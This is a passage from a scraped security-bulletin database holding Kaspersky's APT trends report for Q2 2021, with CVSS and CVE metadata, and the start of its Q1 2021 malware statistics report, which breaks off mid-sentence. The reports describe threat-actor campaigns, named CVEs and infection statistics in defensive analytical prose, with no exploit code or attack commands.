post-compromise toolset made up mostly of publicly available tools. We also found other previously unknown active backdoors, that we call "evsroin", used as secondary implants. Another interesting find was a related loader (found in a staging directory) that loaded a KABA1 implant variant. KABA1 was an implant used against targets throughout the South China Sea that we attributed to the Naikon APT back in 2016. On another note, on the affected hosts we found additional multiple malware families shared by Chinese-speaking actors, such as ShadowPad and Quarian backdoors. These did not seem to be directly connected to the TPCon/evsroin incidents because the supporting infrastructure appeared to be completely separate. One of the ShadowPad samples appears to have been detected in 2020, while the others were detected well before that, in 2019. Besides the Naikon tie, we found some overlaps with previously reported IceFog and IamTheKing activities.\n\n## Middle East\n\nBlackShadow is a threat group that became known after exfiltrating sensitive documents from Shirbit, an Israeli insurance company, and demanding a ransom in exchange for not releasing the information in its possession. Since then, the group has made more headlines, breaching another company in Israel and publishing a trove of documents containing customer related information on Telegram. Following this, we found several samples of the group's unique .NET backdoor in our telemetry that were formerly unknown to us, one of which was recently detected in Saudi Arabia. By pivoting on new infrastructure indicators that we observed in those samples, we were able to find a particular C2 server that was contacted by a malicious Android implant and shows ties to the group's activity.\n\nWe previously covered a WildPressure campaign against targets in the Middle East . Keeping track of the threat actor's malware this spring, we were able to find a newer version (1.6.1) of their C++ Trojan, a corresponding VBScript variant with the same version and a completely new set of modules, including an orchestrator and three plugins. This confirms our previous assumption that there are more last-stagers besides the C++ ones, based on one of the fields in the C2 communication protocol which contains the "client" programming language. Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Perhaps the most interesting finding here is that this malware was developed for both Windows and macOS operating systems. In this case, the hardcoded version is 2.2.1. The coding style, overall design and C2 communication protocol is quite recognisable across all programming languages used by the attackers. The malware used by WildPressure is still under active development in terms of versions and programming languages in use. Although we could not associate WildPressure's activity with other threat actors, we did find minor similarities in the TTPs (Tactics, Techniques and Procedures) used by BlackShadow, which is also active in the same region. However, we consider that these similarities serve as minor ties and are not enough to make any attribution.\n\nWe discovered an ongoing campaign that we attribute to an actor named WIRTE, beginning in late 2019, targeting multiple sectors, focused on the Middle East. WIRTE is a lesser-known threat actor first publicly referenced in 2019, which we suspect has relations with the Gaza Cybergang threat actor group. During our hunting efforts, in February, for threat actor groups that are using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant - a VBS script. The VBS script's main function is to collect system information and execute arbitrary code sent by the attackers. Although we recently reported on a new Muddywater first stage VBS implant used for reconnaissance and profiling activities, these intrusion sets have slightly different TTPs and wider targeting. To date, we have recorded victims focused in the Middle East and a few other countries outside this region. Despite various industries being affected, the focus was mainly towards government and diplomatic entities; however, we also noticed an unusual targeting of law firms.\n\nGoldenJackal is the name we have given to a cluster of activity, recently discovered in our telemetry, that has been active since November 2019. This intrusion set consists of a set of .NET-based implants that are intended to control victim machines and exfiltrate certain files from them, suggesting that the actor's primary motivation is espionage. Furthermore, the implants were found in a restricted set of machines associated with diplomatic entities in the Middle East. Analysis of the aforementioned malware, as well as the accompanied detection logs, portray a capable and moderately stealthy actor. This can be substantiated by the successful foothold gained by the underlying actor in the few organizations we came across, all the while keeping a low signature and ambiguous footprint.\n\n## Southeast Asia and Korean Peninsula\n\nThe ScarCruft group is a geo-political motivated APT group that usually attacks government entities, diplomats and individuals associated with North Korean affairs. Following our last report about this group, we had not seen its activities for almost a year. However, we observed that ScarCruft compromised a North Korea-related news media website in January, beginning a campaign that was active until March. The attackers utilized the same exploit chains, CVE-2020-1380 and CVE-2020-0986, also used in [Operation Powerfall](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>). Based on the exploit code and infection scheme characteristics, we suspect that Operation PowerFall has a connection with the ScarCruft group. The exploit chain contains several stages of shellcode execution, finally deploying a Windows executable payload in memory. We discovered several victims from South Korea and Singapore. Besides this watering-hole attack, this group also used Windows executable malware concealing its payload. This malware, dubbed "ATTACK-SYSTEM", also used multi-stage shellcode infection to deliver the same final payload named "BlueLight". BlueLight uses OneDrive for C2. Historically, ScarCruft malware, especially RokRat, took advantage of personal cloud servers as C2 servers, such as pCloud, Box, Dropbox, and Yandex.\n\nIn May 2020, the Criminal Investigation Bureau (CIB) of Taiwan published an announcement about an attack targeting Taiwanese legislators. Based on their information, an unknown attacker sent spear-phishing emails using a fake presidential palace email account, delivering malware we dubbed "Palwan". Palwan is malware capable of performing basic backdoor functionality as well as downloading further modules with additional capabilities. Analysing the malware, we discovered another campaign, active in parallel, targeting Nepal. We also found two more waves of attacks launched against Nepal in October 2020 and in January this year using Palwan malware variants. We suspect that the targeted sector in Nepal is similar to the one reported by the CIB of Taiwan. Investigating the infrastructure used in the Nepal campaigns, we spotted an overlap with Dropping Elephant activity. However, we don't deem this overlap sufficient to attribute this activity to the Dropping Elephant threat actor.\n\nBlueNoroff is a long-standing, financially motivated APT group that has been targeting the financial industry for years. In recent operations, the group has focused on cryptocurrency businesses. Since the publication of our research of BlueNoroff's "SnatchCrypto" campaign in 2020, the group's strategy to deliver malware has evolved. In this campaign, BlueNoroff used a malicious Word document exploiting CVE-2017-0199, a remote template injection vulnerability. The injected template contains a Visual Basic script, which is responsible for decoding the next payload from the initial Word document and injecting it into a legitimate process. The injected payload creates a persistent backdoor on the victim's machine. We observed several types of backdoor. For further surveillance of the victim, the malware operator may also deploy additional tools. BlueNoroff has notably set up fake blockchain, or cryptocurrency-related, company websites for this campaign, to lure potential victims and initiate the infection process. Numerous decoy documents were used, which contain business and nondisclosure agreements as well as business introductions. When compared to the previous SnatchCrypto campaign, the BlueNoroff group utilized a similar backdoor and PowerShell agent but changed the initial infection vector. Windows shortcut files attached to spear-phishing emails used to be the starting point for an infection: they have now been replaced by weaponized Word documents.\n\nWe have discovered [Andariel activity](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) using a revised infection scheme and custom ransomware targeting a broad spectrum of industries located in South Korea. In April, we observed a suspicious document containing a Korean file name and decoy uploaded to VirusTotal. It revealed a novel infection scheme and an unfamiliar payload. During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. After a deep analysis we reached a different conclusion - that the Andariel group was behind these attacks. Code overlaps between the second stage payload in this campaign and previous malware from the Andariel group allowed for this attribution. Apart from the code similarity and the victimology, we found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity. The threat actor has been spreading the third stage payload since the middle of 2020 and leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware. This ransomware adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.\n\nWe recently uncovered a large-scale and highly active attack in Southeast Asia coming from a threat actor we dubbed [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). Further analysis revealed that this malicious activity dates back to October 2020 and was still ongoing at the time we reported it in June. LuminousMoth takes advantage of DLL sideloading to download and execute a Cobalt Strike payload. However, perhaps the most interesting part of this attack is its capability to spread to other hosts by infecting USB drives. In addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate files; and an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser. Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which was seen targeting the same region and using similar tools in the past. Most early sightings of this activity were in Myanmar, but it now appears that the attackers are much more active in the Philippines, where the number of known attacks has grown more than tenfold. This raises the question of whether this is caused by a rapid replication through removable devices or by an unknown infection vector, such as a watering-hole focusing on the Philippines.\n\nWe recently reported SideCopy campaigns attacking the Windows platform together with Android-based implants. These implants turned out to be multiple applications working as information stealers to collect sensitive information from victims' devices, such as contact lists, SMS messages, call recordings, media and other types of data. Following up, we discovered additional malicious Android applications, some of them purporting to be known messaging apps like Signal or an adult chat platform. These newly discovered applications use the Firebase messaging service as a channel to receive commands. The operator is able to control if either Dropbox or another, hard coded server is used to exfiltrate stolen files.\n\n## Other interesting discoveries\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, [we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>). Interestingly, the exploit was found in the wild as part of a separate framework, alongside CVE-2021-1732 as well as other previously patched exploits. We are highly confident that this framework is entirely unrelated to Bitter APT and was used by a different threat actor. Further analysis revealed that this Escalation of Privilege (EoP) exploit has potentially been used in the wild since at least November 2020. Upon discovery, we reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310.\n\nVarious marks and artifacts left in the exploit mean that we are also highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as "Moses". "Moses" appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from "Moses". While the EoP exploit was discovered in the wild, we are currently unable to directly tie its usage to any known threat actor that we are currently tracking. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nIn another, more recent investigation into the surge of attacks by APT actors against Exchange servers following the revelation of ProxyLogon and other Exchange vulnerabilities, we took note of one unique cluster of activity. It attracted our attention because the actor behind it seemed to have been active in compromising Exchange servers since at least December 2020, all the while using a toolset that we were not able to associate with any known threat group. During March, several waves of attacks on Exchange servers were made public, partially describing the same cluster of activity that we had observed. One of them, reported by ESET, contained an assessment that the actor behind this activity had access to the Exchange exploits prior to their public release, which aligns with our observations of the early activity of it last year. That said, none of the public accounts described sightings of the full infection chain and later stages of malware deployed as part of this group's operation. Adopting the name Websiic, given publicly to this cluster of activity by ESET, we reported the TTPs of the underlying threat actor. Namely, we focused on the usage of both commodity tools like the China Chopper webshell and a proprietary .NET backdoor used by the group, which we dubbed "Samurai", as well as describing a broader set of targets than the one documented thus far.\n\nOn 15 April, Codecov publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between the 31 January and the 1 April. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports, and send them to the Codecov infrastructure. As a result, this script compromise effectively constitutes a supply-chain attack. The Bash uploader script is typically executed as a trusted resource in development and testing environments (including as part of automated build processes, such as continuous integration or development pipelines); and its compromise could enable malicious access to infrastructure or account secrets, as well as code repositories and source code. While we haven't been able to confirm the malicious script deployment, retrieve any information on the compromise goals, or identify further associated malicious tools yet, we were able to collect one sample of a compromised Bash uploader script, as well as identify some possibly associated additional malicious servers.\n\nAn e-mail sent by Click Studios to its customers on 22 April informed them that a sophisticated threat actor had gained access to the Passwordstate automatic updating functionality, referred to as the in-place upgrade. Passwordstate is a password management tool for enterprises, and on 20 April, for a period of about 28 hours, a malicious DLL was included in the software updates. On 24 April, an incident management advisory was also released. The purpose of the campaign was to steal passwords stored in the password manager. Although this attack was only active for a short time, we managed to obtain the malicious DLLs and reported our initial findings. Nevertheless, it's still unclear how the attackers gained access to the Passwordstate software to begin with. Following a new advisory published by Click Studio on 28 April, we discovered a new variant of the malicious DLL used to backdoor the Passwordstate password manager. This DLL variant was distributed in a phishing campaign, most likely by the same actor.\n\nA few days after April's Patch Tuesday updates from Microsoft (13 April), a number of suspicious files caught our attention. These files were binaries, disguised as "April 2021 Security Update Installers". They were signed with a valid digital signature, delivering Cobalt Strike beacon modules. It is likely that the modules were signed with a stolen digital certificate. These Cobalt Strike beacon implants were configured with a hardcoded C2, "code.microsoft.com". Contrary to a (now redacted) publication from the Qihoo 360 team revolving around this activity, we can confirm that there was no compromise of Microsoft's infrastructure. In fact, an unauthorized party took over the dangling subdomain "code.microsoft.com" and configured it to resolve to their Cobalt Strike host, setup around 15 April. That domain hosted a Cobalt Strike beacon payload served to HTTP clients using a specific and unique user agent. According to Microsoft and the initial Qihoo notification, the impact in this case was very limited and didn't affect unsuspecting visitors to this website because of the required unique user agent.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and the most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor which in turns connects to the C2 to get commands. So far, we haven't been able to find any connections or overlaps with a known actor. Therefore, we are tentatively calling this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nOn April 16, we began hearing rumors about active exploitation of Pulse Secure devices from other researchers in the community. One day prior to this, the NSA, CISA, and FBI had jointly published an advisory stating that APT29 was conducting widespread scanning and exploitation of vulnerable systems, including Pulse Secure. For this reason, initial thoughts were that the two were related; and these were just rumors circulating the community about old activity that was being brought to light again. Following this, we were able to at least confirm that the initial rumors were part of a separate set of activities that had occurred between January and March and were not directly related to the advisory mentioned above. This new activity involved the exploitation of at least two vulnerabilities in Pulse Secure; one previously patched and one zero-day (CVE-2021-22893). We also became aware of affected organizations that were notified by a third party that they were potentially compromised by this activity. After exploitation, the threat actor proceeded to deploy a simple webshell to maintain persistence. On May 3, Pulse Secure delivered "out-of-cycle" update and workaround packages to provide a solution for the multiple vulnerabilities.\n\nCooperating with Check Point Research, we discovered an ongoing attack targeting a small group of individuals in Xinjiang and Pakistan, in regions mostly populated by the Uyghur minority. The attackers used malicious executables that collect information about the infected system and attempt to download a second-stage payload. The actor put considerable effort into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up-to-date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups. In our report, we examined the flow of both infection vectors and provided our analysis of the malicious artifacts we came across during this investigation, even though we were unable to obtain the later stages of the infection chain.\n\n## Final thoughts\n\nWhile the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organisation or compromising an individual's device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q2 2021:\n\n * We have reported several supply-chain attacks in recent months.. While some were major and have attracted worldwide attention, we observed equally successful low-tech attacks, such as BountyGlad, CoughingDown and the attack targeting Codecov.\n * APT groups mainly use social engineering to gain an initial foothold in a target network. However, we've seen a rise in APT threat actors leveraging exploits to gain that initial foothold - including the zero-days developed by the exploit developer we call "Moses" and those used in the PuzzleMaker, Pulse Secure attacks and the Exchange server vulnerabilities.\n * APT threat actors typically refresh and update their toolsets: this includes not only the inclusion of new platforms but also the use of additional languages as seen by WildPressure's macOS-supported Python malware.\n * As illustrated by the campaigns of various threat actors - including BountyGlad, HotCousin, GoldenJackal, Scarcruft, Palwan, Pulse Secure and the threat actor behind the WebDav-O/Mail-O implants - geo-politics continues to drive APT developments.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T10:00:46", "type": "securelist", "title": "APT trends report Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2020-0986", "CVE-2020-1380", "CVE-2021-1732", "CVE-2021-22893", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-07-29T10:00:46", "id": "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "href": "https://securelist.com/apt-trends-report-q2-2021/103517/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-31T11:03:47", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2021:\n\n * Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources across the globe.\n * 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempts to run malware designed to steal money via online access to bank accounts were stopped on the computers of 118,099 users.\n * Ransomware attacks were defeated on the computers of 91,841 unique users.\n * Our File Anti-Virus detected 77,415,192 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nAt the end of last year, the number of users attacked by malware designed to steal money from bank accounts gradually decreased, a trend that continued in Q1 2021. This quarter, in total, Kaspersky solutions blocked the malware of such type on the computers of 118,099 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110545/01-en-malware-report-q1-2021-pc.png>))_\n\n**Attack geography**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110629/02-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 6.3 \n2 | Tajikistan | 5.3 \n3 | Afghanistan | 4.8 \n4 | Uzbekistan | 4.6 \n5 | Paraguay | 3.2 \n6 | Yemen | 2.1 \n7 | Costa Rica | 2.0 \n8 | Sudan | 2.0 \n9 | Syria | 1.5 \n10 | Venezuela | 1.4 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nAs before, the most widespread family of bankers in Q1 was ZeuS/Zbot (30.8%). Second place was taken by the CliptoShuffler family (15.9%), and third by Trickster (7.5%). All in all, more than half of all attacked users encountered these families. The notorious banking Trojan Emotet (7.4%) was deprived of its infrastructure this quarter as a result of a [joint operation](<https://www.europol.europa.eu/newsroom/news/world's-most-dangerous-malware-emotet-disrupted-through-global-action>) by Europol, the FBI and other law enforcement agencies, and its share predictably collapsed.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 30.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.9 \n3 | Trickster | Trojan.Win32.Trickster | 7.5 \n4 | Emotet | Backdoor.Win32.Emotet | 7.4 \n5 | RTM | Trojan-Banker.Win32.RTM | 6.6 \n6 | Nimnul | Virus.Win32.Nimnul | 5.1 \n7 | Nymaim | Trojan.Win32.Nymaim | 4.7 \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.8 \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 2.2 \n \n_** Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n**New additions to the ransomware arsenal**\n\nLast year, the SunCrypt and RagnarLocker ransomware groups adopted new scare tactics. If the victim organization is slow to pay up, even though its files are encrypted and some of its confidential data has been stolen, the attackers additionally threaten to carry out a DDoS attack. In Q1 2021, these two groups were joined by a third, Avaddon. Besides publishing stolen data, the ransomware operators said on their website that the victim would be subjected to a DDoS attack until it reached out to them.\n\nREvil (aka Sodinokibi) is another group looking to increase its extortion leverage. In addition to DDoS attacks, it has [added](<https://twitter.com/3xp0rtblog/status/1368149692383719426>) spam and calls to clients and partners of the victim company to its toolbox.\n\n**Attacks on vulnerable Exchange servers**\n\n[Serious vulnerabilities were recently discovered](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) in the Microsoft Exchange mail server, allowing [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Ransomware distributors wasted no time in exploiting these vulnerabilities; to date, this infection vector was seen being used by the Black Kingdom and DearCry families.\n\n**Publication of keys**\n\nThe developers of the Fonix (aka XINOF) ransomware ceased distributing their Trojan and posted the master key online for decrypting affected files. We took this key and created a [decryptor](<https://www.kaspersky.com/blog/fonix-decryptor/38646/>) that anyone can use. The developers of another strain of ransomware, Ziggy, not only [published](<https://www.bleepingcomputer.com/news/security/ziggy-ransomware-shuts-down-and-releases-victims-decryption-keys/>) the keys for all victims, but also announced their [intention](<https://www.bleepingcomputer.com/news/security/ransomware-admin-is-refunding-victims-their-ransom-payments/>) to return the money to everyone who paid up.\n\n**Law enforcement successes**\n\nLaw enforcement agencies under the US Department of Justice [seized](<https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware>) dark web resources used by NetWalker (aka Mailto) ransomware affiliates, and also brought charges against one of the alleged actors.\n\nFrench and Ukrainian law enforcers worked together to trace payments made through the Bitcoin ecosystem to Egregor ransomware distributors. The joint investigation resulted in the [arrest](<https://www.bleepingcomputer.com/news/security/egregor-ransomware-affiliates-arrested-by-ukrainian-french-police/>) of several alleged members of the Egregor gang.\n\nIn South Korea, a suspect in the GandCrab ransomware operation was [arrested](<https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-affiliate-arrested-for-phishing-attacks/>) (this family ceased active distribution back in 2019).\n\n### Number of new modifications\n\nIn Q1 2021, we detected seven new ransomware families and 4,354 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2020 \u2013 Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110702/03-en-ru-es-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2021, Kaspersky products and technologies protected 91,841 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110733/04-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of attacks by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110802/05-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.31% \n2 | Ethiopia | 0.62% \n3 | Greece | 0.49% \n4 | Pakistan | 0.49% \n5 | China | 0.48% \n6 | Tunisia | 0.44% \n7 | Afghanistan | 0.42% \n8 | Indonesia | 0.38% \n9 | Taiwan, Province of China | 0.37% \n10 | Egypt | 0.28% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.37% \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 12.01% \n3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 9.31% \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 8.45% \n5 | (generic verdict) | Trojan-Ransom.Win32.Agent | 7.36% \n6 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom\n\nVirus.Win32.PolyRansom | 3.78% \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.93% \n8 | Stop | Trojan-Ransom.Win32.Stop | 2.79% \n9 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.17% \n10 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.85% \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new modifications\n\nIn Q1 2021, Kaspersky solutions detected 23,894 new modifications of miners. And though January and February passed off relatively calmly, March saw a sharp rise in the number of new modifications \u2014 more than fourfold compared to February.\n\n_Number of new miner modifications, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110831/06-en-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 432,171 unique users of Kaspersky products worldwide. Although this figure has been rising for three months, it is premature to talk about a reversal of last year's trend, whereby the number of users attacked by miners actually fell. For now, we can tentatively assume that the growth in cryptocurrency prices, in particular bitcoin, has attracted the attention of cybercriminals and returned miners to their toolkit.\n\n_Number of unique users attacked by miners, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111053/07-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of miner attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111128/08-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.65 \n2 | Ethiopia | 3.00 \n3 | Rwanda | 2.37 \n4 | Uzbekistan | 2.23 \n5 | Kazakhstan | 1.81 \n6 | Sri Lanka | 1.78 \n7 | Ukraine | 1.59 \n8 | Vietnam | 1.48 \n9 | Mozambique | 1.46 \n10 | Tanzania | 1.45 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nIn Q1 2021, we noted a drop in the share of exploits for vulnerabilities in the Microsoft Office suite, but they still lead the pack with 59%. The most common vulnerability in the suite remains [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a stack buffer overflow that occurs when processing objects in the Equation Editor component. Exploits for [CVE-2015-2523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2523>) \u2014 use-after-free vulnerabilities in Microsoft Excel \u2014 and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which we've often written about, were also in demand. Note the age of these vulnerabilities \u2014 even the latest of them was discovered almost three years ago. So, once again, we remind you of the importance of regular updates.\n\nThe first quarter was rich not only in known exploits, but also new zero-day vulnerabilities. In particular, the interest of both [infosec experts](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals was piqued by vulnerabilities in the popular Microsoft Exchange Server:\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>)\u2014 a service-side request forgery vulnerability that allows remote code execution (RCE)\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>)\u2014 an insecure deserialization vulnerability in the Unified Messaging service that can lead to code execution on the server\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>)\u2014 a post-authorization arbitrary file write vulnerability in Microsoft Exchange, which could also lead to remote code execution\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>)\u2014 as in the case of [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), allows an authorized Microsoft Exchange user to write data to an arbitrary file in the system\n\nFound [in the wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), these vulnerabilities were used by APT groups, including as a springboard for ransomware distribution.\n\nDuring the quarter, vulnerabilities were also identified in Windows itself. In particular, the [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1732>) vulnerability allowing privilege escalation was discovered in the Win32k subsystem. Two other vulnerabilities, [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1647>) and [CVE-2021-24092](<https://nvd.nist.gov/vuln/detail/CVE-2021-24092>), were found in the Microsoft Defender antivirus engine, allowing elevation of user privileges in the system and execution of potentially dangerous code.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111159/09-en-malware-report-q1-2021-pc.png>))_\n\nThe second most popular were exploits for browser vulnerabilities (26.12%); their share in Q1 grew by more than 12 p.p. Here, too, there 